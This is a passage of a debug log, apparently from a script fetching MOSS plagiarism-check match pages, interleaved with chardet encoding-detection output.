http://moss.stanford.edu/results/374137986/match138.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match139.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match140.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match141.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match142.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match143.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match144.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match145.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match146.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match147.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match148.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match152.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match150.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match151.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match149.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match153.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match154.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match155.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match156.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match158.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match159.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match160.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match161.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match162.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match163.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match168.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match173.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match175.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match176.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match177.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match183.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match184.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match185.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match187.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match188.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match189.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match190.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match191.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match192.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match193.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match194.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match195.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match196.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match197.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match200.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match199.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match198.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match201.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match202.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match204.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match220.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match222.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match224.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match225.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match226.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match227.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match228.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match229.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match230.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match231.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match232.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match233.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match234.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match235.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match236.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match237.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match238.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match239.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match240.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match241.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match242.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match243.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match244.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match245.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match246.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match247.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match248.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match249.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 26425\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20318\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19286\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 26412\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 26425\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20305\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19273\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 26412\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23059\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20318\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19286\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23072\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 26412\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20305\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23059\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19273\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 26413\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23059\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20305\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19273\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 26412\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23060\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20306\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19274\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23059\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20305\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19273\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not 
active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5338017868424185\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5190788803750156\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 
0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2-top.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5196959789580947\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2-0.html\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2-1.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match3-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23417\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23404\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23417\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23404\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23404\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23405\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23404\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32873\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5168736950658681\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19967\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1-top.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32860\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19954\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32873\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19967\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32860\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19954\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 
19954\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32860\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19955\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19954\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32861\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32860\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5369503388353455\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 
0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5557286372017827\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.516668753076103\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1-1.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 